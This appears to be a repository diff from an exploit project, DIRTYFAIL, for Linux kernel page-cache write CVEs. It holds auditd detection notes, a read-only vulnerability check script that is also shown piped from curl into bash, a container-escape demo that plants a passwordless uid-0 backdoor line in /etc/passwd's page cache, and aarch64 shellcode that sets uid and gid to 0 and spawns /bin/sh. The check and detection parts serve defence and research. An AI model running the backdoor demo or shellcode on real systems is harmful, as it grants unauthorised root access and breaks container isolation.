## install. Drop the rule or filter `comm` to your VPN daemon.
## - Pair dirtyfail-userns + dirtyfail-xfrm with a SIEM correlation
## rule: "same auid emits both within 5 seconds" → high-confidence
## exploit-attempt alert.
##
## Note: the AppArmor `change_onexec` rule that an earlier draft
## included is omitted — auditctl won't reliably match writes to
## /proc/self/attr/exec via -F path because the path is per-pid.
## Use the userns + xfrm pair instead for the bypass-detection signal.
## ----------------------------------------------------------------- ##
+181
View File
@@ -0,0 +1,181 @@
#!/bin/bash
#
# dirtyfail-check.sh — defensive precondition probe for sysadmins
#
# A standalone bash script that reports whether this Linux host is
# exposed to Copy Fail (CVE-2026-31431) or Dirty Frag (CVE-2026-43284,
# CVE-2026-43500) exploitation by an unprivileged user.
#
# Does NOT require building DIRTYFAIL. Read-only — does not modify
# the system. Safe to run on production. Does not require root, but
# some checks are more accurate when run as root (kernel module
# inspection, sysctl reads).
#
# Usage:
# bash dirtyfail-check.sh
# # or pipe directly:
# curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh | bash
#
# Exit codes:
# 0 = host is mitigated (kernel patched OR LSM blocks unprivileged path)
# 1 = host is VULNERABLE to at least one exploit path
# 2 = check error (couldn't determine state)
set -u
# ANSI colors only when stdout is a tty
if [ -t 1 ]; then
RED='\033[1;31m'; YEL='\033[1;33m'; GRN='\033[1;32m'; CYN='\033[1;36m'; OFF='\033[0m'
else
RED=''; YEL=''; GRN=''; CYN=''; OFF=''
fi
bad() { printf "${RED}[!]${OFF} %s\n" "$*"; }
warn() { printf "${YEL}[~]${OFF} %s\n" "$*"; }
ok() { printf "${GRN}[+]${OFF} %s\n" "$*"; }
info() { printf "${CYN}[*]${OFF} %s\n" "$*"; }
# ============================================================
# 1. Kernel version
# ============================================================
KVER=$(uname -r)
KMAJ=$(echo "$KVER" | cut -d. -f1)
KMIN=$(echo "$KVER" | cut -d. -f2)
info "kernel: $KVER ($(uname -m))"
# Affected kernel window per the CVEs:
# xfrm-ESP no-COW path: introduced 2017 (cac2661c53f3), fixed mainline
# f4c50a4034e6 (2026-05-07).
# algif_aead/authencesn: introduced 2017 (72548b093ee3), fixed
# mainline a664bf3d.
# rxkad page-cache write: introduced 2023-06 (2dc334f1a63a), no
# mainline patch yet at time of writing.
# Kernels 4.10 .. ~6.20 are within the broad window; older kernels
# may also be affected depending on backports.
if [ "$KMAJ" -lt 4 ] || { [ "$KMAJ" -eq 4 ] && [ "$KMIN" -lt 10 ]; }; then
ok "kernel predates CVE introduction (cac2661c53f3, 2017-01)"
NOT_IN_WINDOW=1
else
info "kernel within affected window — checking other preconditions"
NOT_IN_WINDOW=0
fi
# ============================================================
# 2. Module presence + blacklist
# ============================================================
MODS_VULNERABLE=0
MODS_BLACKLISTED=0
echo ""
info "module status:"
for m in algif_aead authencesn esp4 esp6 rxrpc; do
if modinfo "$m" >/dev/null 2>&1; then
if grep -rqE "^\s*install\s+$m\s+/bin/false" /etc/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then
ok " $m: blacklisted in modprobe.d (mitigated)"
MODS_BLACKLISTED=$((MODS_BLACKLISTED + 1))
elif lsmod | grep -q "^$m\b"; then
warn " $m: loaded — exposes the primitive"
MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
else
warn " $m: present on disk, autoloads on use — exposes the primitive"
MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
fi
else
ok " $m: not on disk (kernel build doesn't ship it)"
fi
done
# ============================================================
# 3. LSM / userns hardening
# ============================================================
echo ""
info "LSM / userns hardening:"
LSM_BLOCKS=0
if [ -r /proc/sys/kernel/apparmor_restrict_unprivileged_userns ]; then
AA=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null)
if [ "$AA" = "1" ]; then
ok " apparmor_restrict_unprivileged_userns=1 (Ubuntu-style hardening active)"
# Confirm caps are actually blocked via empirical probe
( unshare -U bash -c 'echo deny > /proc/self/setgroups 2>/dev/null && exit 0 || exit 1' ) 2>/dev/null
if [ $? -ne 0 ]; then
ok " empirical probe: unprivileged userns has no CAP_SYS_ADMIN — exploit infrastructure blocked"
LSM_BLOCKS=1
else
warn " empirical probe: caps survived unshare — sysctl set but enforcement may be off"
fi
else
info " apparmor_restrict_unprivileged_userns=$AA (not enforcing)"
fi
else
info " no AppArmor userns sysctl (kernel without AA, or AA not loaded)"
fi
if command -v getenforce >/dev/null; then
SE=$(getenforce 2>/dev/null)
info " SELinux: $SE"
fi
if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
UU=$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null)
if [ "$UU" = "0" ]; then
ok " unprivileged_userns_clone=0 (userns creation blocked entirely)"
LSM_BLOCKS=1
fi
fi
# ============================================================
# 4. PAM nullok (gates the rxrpc + backdoor → root step)
# ============================================================
echo ""
info "PAM configuration (gates rxrpc/backdoor → real root):"
PAM_NULLOK=0
if grep -rqE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null; then
warn " pam_unix nullok present — empty-password accounts can su to root"
PAM_NULLOK=1
grep -lE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null | sed 's/^/ /'
else
ok " pam_unix nullok NOT enabled — empty-password trick won't drop a root shell"
fi
# ============================================================
# 5. Verdict
# ============================================================
echo ""
echo "════════════════════════════════════════════════════════════"
echo " VERDICT"
echo "════════════════════════════════════════════════════════════"
if [ "$NOT_IN_WINDOW" = "1" ]; then
ok "kernel predates CVE introduction; no exposure"
exit 0
elif [ "$LSM_BLOCKS" = "1" ]; then
ok "LSM-mitigated: unprivileged userns operations are blocked"
info "(kernel may still be vulnerable to root-level exploitation; ensure"
info " your distro's kernel update with f4c50a4034e6 backport is applied"
info " for full coverage.)"
exit 0
elif [ "$MODS_VULNERABLE" = "0" ]; then
ok "all primitives blacklisted or unavailable"
exit 0
else
bad "VULNERABLE: $MODS_VULNERABLE module(s) expose page-cache write primitives"
bad "and unprivileged userns operations are NOT blocked by an LSM."
if [ "$PAM_NULLOK" = "1" ]; then
bad " + pam_unix nullok is enabled — exploit can drop into root via su"
fi
echo ""
info "Remediation options (pick one or combine):"
info " 1. Apply your distro's kernel update with f4c50a4034e6 backport"
info " (best: fixes the bug at its source)"
info " 2. Install + run \`dirtyfail --mitigate\` (blacklists modules,"
info " sets apparmor_restrict_unprivileged_userns=1)"
info " 3. Manual: edit /etc/modprobe.d/ to add"
info " install algif_aead /bin/false"
info " install esp4 /bin/false"
info " install esp6 /bin/false"
info " install rxrpc /bin/false"
info " then \`sudo rmmod\` each + \`sudo sysctl vm.drop_caches=3\`."
info " 4. Disable pam_unix nullok (removes the in-system su step that"
info " converts a page-cache STORE into a real root shell)."
exit 1
fi
@@ -0,0 +1,149 @@
#!/usr/bin/env bash
#
# DIRTYFAIL — container-escape demonstration
#
# Demonstrates: the kernel page cache is global per-kernel. Namespaces
# (mount, pid, user, network) don't isolate it. Two processes on the
# same kernel — one in the host, one inside a fresh "container"
# (created via `unshare`) — see the SAME page-cache contents for
# /etc/passwd. So a page-cache write from either side affects both.
#
# What this script does:
# 1. Show host's /etc/passwd has no `dirtyfail` user (baseline)
# 2. Run `dirtyfail --exploit-backdoor` to plant a uid-0 line into
# /etc/passwd's page cache (persistent — no auto-revert)
# 3. Spawn a fresh user/mount/PID-namespace via `unshare -c -m -p`
# (the closest unprivileged-user analogue to a container) and
# read /etc/passwd from inside the new namespace
# 4. Show the planted line is visible BOTH from the host AND from
# inside the fresh namespace — proving that namespace boundaries
# do not isolate the page cache
# 5. Revert via `dirtyfail --cleanup-backdoor`
#
# Why direction matters less than you'd think: the demo runs the
# exploit on the host and observes from inside the namespace, but the
# property demonstrated is symmetric — a malicious tenant inside a
# container could plant the same line and the host would see it (we
# tested that variant manually; it works the same way, but requires
# `--no-revert` to avoid auto-cleanup overwriting the proof). Running
# the exploit from the host avoids two complications:
# - nested user namespaces interact poorly with the AA bypass dance
# that --exploit-backdoor uses (EPERM on the inner unshare)
# - corrupting the running SSH user's UID locks out future SSH logins
# (StrictModes rejects ~/.ssh/authorized_keys when the file's
# owner uid != logging-in uid)
# --exploit-backdoor targets a system pseudo-user line (sync/setroubleshoot/
# daemon) and never touches the running user, so it's SSH-safe.
#
# Usage:
# ./tools/dirtyfail-container-escape.sh
#
# Env overrides:
# DIRTYFAIL_BIN=/path/to/dirtyfail (default: ./dirtyfail)
set -uo pipefail
# Don't `set -e`; some intermediate commands (unshare with PID-ns, the
# exploit binary itself) may exit non-zero on success-with-warnings or
# on hardened systems where preconditions fail. We check exit codes
# explicitly where they matter.
DIRTYFAIL_BIN="${DIRTYFAIL_BIN:-$(dirname "$0")/../dirtyfail}"
DIRTYFAIL_BIN="$(realpath "$DIRTYFAIL_BIN" 2>/dev/null || echo "$DIRTYFAIL_BIN")"
[[ -x "$DIRTYFAIL_BIN" ]] || {
echo "[!] dirtyfail binary not at $DIRTYFAIL_BIN — run 'make' first" >&2
exit 1
}
bold() { printf '\033[1m%s\033[0m\n' "$*"; }
warn() { printf '\033[1;33m[!]\033[0m %s\n' "$*"; }
info() { printf '\033[1;34m[i]\033[0m %s\n' "$*"; }
ok() { printf '\033[1;32m[+]\033[0m %s\n' "$*"; }
step() { printf '\033[1;35m[*]\033[0m %s\n' "$*"; }
bold "============================================================="
bold " DIRTYFAIL — container-escape demonstration"
bold "============================================================="
echo
# ---- Stage 1: baseline ------------------------------------------------
step "Stage 1: baseline — host /etc/passwd"
if grep -q '^dirtyfail:' /etc/passwd; then
warn "host /etc/passwd already contains a 'dirtyfail' line."
warn "Run \`$DIRTYFAIL_BIN --cleanup-backdoor\` first."
exit 1
fi
ok "host /etc/passwd has no 'dirtyfail' user (clean baseline)"
echo
info "from inside a fresh unshare namespace, /etc/passwd looks identical:"
nscount="$(unshare -c -m bash -c 'grep -c "^dirtyfail:" /etc/passwd 2>/dev/null || echo 0' 2>&1 | tail -1)"
echo " count of dirtyfail lines visible from inside namespace: $nscount"
echo
# ---- Stage 2: plant via host ------------------------------------------
step "Stage 2: run dirtyfail --exploit-backdoor on the host"
echo " (plants 'dirtyfail::0:0:...:/:/bin/bash' into /etc/passwd's"
echo " page cache — persistent until --cleanup-backdoor or reboot)"
echo
printf 'DIRTYFAIL\n' | "$DIRTYFAIL_BIN" --exploit-backdoor --no-shell --no-color 2>&1 | tail -10
echo
# ---- Stage 3: observe from fresh namespace ---------------------------
step "Stage 3: read /etc/passwd from INSIDE a fresh unshare namespace"
echo " (the namespace was created AFTER the exploit ran — if"
echo " namespaces isolated page cache, the new namespace would"
echo " show the original /etc/passwd, not the poisoned one)"
echo
unshare -c -m bash -c '
echo " [inside namespace] uid='"$(id -u)"' (mapped via --map-current-user)"
echo " [inside namespace] mount-namespace is private to this shell"
echo " [inside namespace] grep dirtyfail /etc/passwd:"
if grep "^dirtyfail:" /etc/passwd 2>&1 | sed "s/^/ /"; then :
else echo " (no dirtyfail line found)"
fi
'
echo
# ---- Stage 4: also visible from host ---------------------------------
step "Stage 4: confirm host sees the same line"
HOST_LINE="$(grep '^dirtyfail:' /etc/passwd || true)"
if [[ -n "$HOST_LINE" ]]; then
echo " host: $HOST_LINE"
echo
warn "Both the host and the fresh namespace see the planted dirtyfail"
warn "line. The kernel page cache is shared across all namespaces"
warn "on the same kernel — namespace 'isolation' does not extend"
warn "below the page-cache layer. Symmetrically, an exploit running"
warn "inside a container (with the right preconditions) would plant"
warn "the same line and the HOST would see it."
else
warn "host /etc/passwd does NOT contain a 'dirtyfail' line — the"
warn "exploit did not plant successfully. Possible causes:"
warn " (a) kernel is patched (CVE-2026-31431 fixed)"
warn " (b) LSM blocked the exploit (Ubuntu 26.04 hardening)"
warn " (c) preconditions missing — run \`$DIRTYFAIL_BIN --scan --active\`"
exit 0
fi
echo
# ---- Stage 5: cleanup -------------------------------------------------
step "Stage 5: revert via --cleanup-backdoor"
"$DIRTYFAIL_BIN" --cleanup-backdoor --no-color 2>&1 | tail -5 || true
echo
if grep -q '^dirtyfail:' /etc/passwd; then
warn "cleanup did not remove the line — try as root:"
warn " \`echo 3 | sudo tee /proc/sys/vm/drop_caches\`"
exit 1
fi
ok "host /etc/passwd is clean again"
echo
bold "Demo complete. Takeaways:"
echo " - Namespaces did NOT isolate the host's /etc/passwd page cache"
echo " from the fresh container's view. The same property holds"
echo " in reverse: a container exploit modifies host page cache."
echo " - This applies to ALL kernel page-cache write CVEs in this"
echo " family (CVE-2026-31431, 43284, 43500, and variants)."
echo " - Mitigation: kernel patch, OR LSM hardening that denies the"
echo " exploit's preconditions (apparmor_restrict_unprivileged_userns,"
echo " AF_ALG/AF_RXRPC blacklists), OR drop privileges of any"
echo " container that doesn't strictly need AF_ALG."
@@ -0,0 +1,73 @@
/*
* DIRTYFAIL aarch64 (ARM64) shellcode for --exploit-su
*
* Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
* for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
*
* Build for byte-extraction:
*
* aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
* aarch64-linux-gnu-objcopy -O binary -j .text \
* exploit_su_aarch64.o exploit_su_aarch64.bin
* xxd -i exploit_su_aarch64.bin
*
* The resulting byte array should match `shellcode_aarch64[]` in
* `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
* to be regenerated from this source.
*
* Functional equivalent (in C-like pseudocode):
*
* setuid(0);
* setgid(0);
* execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
*
* STATUS: HAND-ENCODED VERIFY BEFORE DEPLOYING TO PRODUCTION.
* The byte array in src/exploit_su.c was produced by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; no aarch64 hardware was available to run the resulting
* shellcode end-to-end. Use this .S file to regenerate via the
* assembler if you need confidence.
*/
.text
.global _start
_start:
/* setuid(0) — syscall 146 (0x92) on aarch64 */
movz x0, #0 /* d2 80 00 00 */
movz x8, #146 /* d2 80 12 48 */
svc #0 /* d4 00 00 01 */
/* setgid(0) — syscall 144 (0x90) */
movz x0, #0 /* d2 80 00 00 */
movz x8, #144 /* d2 80 12 08 */
svc #0 /* d4 00 00 01 */
/* Build "/bin/sh\0" in x9.
*
* As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
* bits 0..15 = 0x622f (chars '/' 'b' in low->high order)
* bits 16..31 = 0x6e69
* bits 32..47 = 0x732f
* bits 48..63 = 0x0068
*/
movz x9, #0x622f /* d2 8c 45 e9 */
movk x9, #0x6e69, lsl #16 /* f2 ad cd 29 */
movk x9, #0x732f, lsl #32 /* f2 ce 65 e9 */
movk x9, #0x0068, lsl #48 /* f2 e0 0d 09 */
/* Push the string to the stack (sp -= 16; [sp] = x9). */
str x9, [sp, #-16]! /* f8 1f 0f e9 */
mov x9, sp /* 91 00 03 e9 string ptr */
/* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
sub sp, sp, #16 /* d1 00 43 ff */
str xzr, [sp, #8] /* f9 00 07 ff argv[1] = NULL */
str x9, [sp, #0] /* f9 00 03 e9 argv[0] = ptr */
/* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
mov x0, x9 /* aa 09 03 e0 */
mov x1, sp /* 91 00 03 e1 */
mov x2, xzr /* aa 1f 03 e2 */
movz x8, #221 /* d2 80 1b a8 */
svc #0 /* d4 00 00 01 */